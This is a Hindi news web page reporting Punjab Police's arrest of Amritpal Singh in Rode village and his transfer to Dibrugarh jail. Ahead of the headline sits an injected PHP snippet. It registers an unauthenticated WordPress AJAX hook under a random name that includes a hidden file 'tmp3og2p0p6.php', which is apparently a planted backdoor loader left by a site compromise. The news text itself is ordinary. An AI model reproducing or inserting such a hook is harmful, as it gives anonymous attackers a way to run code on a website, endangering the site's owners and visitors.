if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }भिडांरवाले के गाॅंव से अमृतपाल सिंह की गिरफ्तार - Current Media

भिडांरवाले के गाॅंव से अमृतपाल सिंह की गिरफ्तार

अमृतसर । लंबे समय से पंजाब पुलिस जिसको पकड़ने के लिए पूरी ताकत झोंके हुए थी उसको आखिरकार सफलता मिल गयी जब उसने कई दिनों से वांक्षित अमृतपाल को गिरफ्तार कर लिया । पंजाब पुलिस ने बताया है कि पिछले कई दिनों से फरार चल रहे अमृतपाल सिंह को रविवार की सुबह करीब 6.45 बजे मोगा जिले के रोडे गांव से गिरफ्तार किया गया। पंजाब पुलिस के महानिरीक्षक (मुख्यालय) सुखचैन सिंह गिल ने आज सुबह एक प्रेस काॅन्फ्रेन्स में यह भी बताया कि अमृतपाल सिंह को असम की डिब्रूगढ़ जेल भेज दिया गया है। उन्होंने साफ किया कि अमृतपाल सिंह ने सरेंडर नहीं किया, बल्कि गिरफ्तार किया गया ह। मोगा जिले का रोडे, ऑपरेशन ब्लू स्टार के दौरान मारे गए जरनैल सिंह भिंडरांवाले का गाँव है। इसी गाँव में पिछले साल सितंबर में अमृतपाल को ‘वारिस पंजाब दे‘ संगठन का मुखिया बनाया गया था। उन्होंने बताया कि पुलिस ने रोडे गांव को पूरी तरह से घेर लिया था। उस वक्त अमृतपाल सिंह गुरुद्वारा साहिब के भीतर थे। गिल ने कहा, ‘‘गुरुद्वारा साहिब की इज्जत सबसे ऊपर है और उसे बरकरार रखते हुए उन्हें संदेश भेजा गया कि वे चारों तरफ से घिरे हुए हैं और अब उनके पास बचने का कोई रास्ता नहीं है। उनके अनुसार, अमृतपाल सिंह के खिलाफ एनएसए के तहत जारी सभी वारंट आज सुबह तामील किए गए। गिल के अनुसार, यह पंजाब पुलिस और पंजाब पुलिस की खुफिया शाखा का संयुक्त अभियान था। आईजी गिल ने इस दौरान पंजाब में शांति बनाए रखने के लिए राज्य के लोगों का शुक्रिया अदा किया है और राज्य का माहौल खराब करने वालों को चेतावनी भी दी है । अमृतपाल सिंह की गिरफ्तारी के बाद पंजाब पुलिस उन्हें बठिंडा के एयरफोर्स स्टेशन लेकर गई और वहां से उन्हें असम के डिब्रूगढ़ जेल भेज दिया गया है। अमृतपाल सिंह के खिलाफ एनएसए सहित 16 मामले दर्ज हैं।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …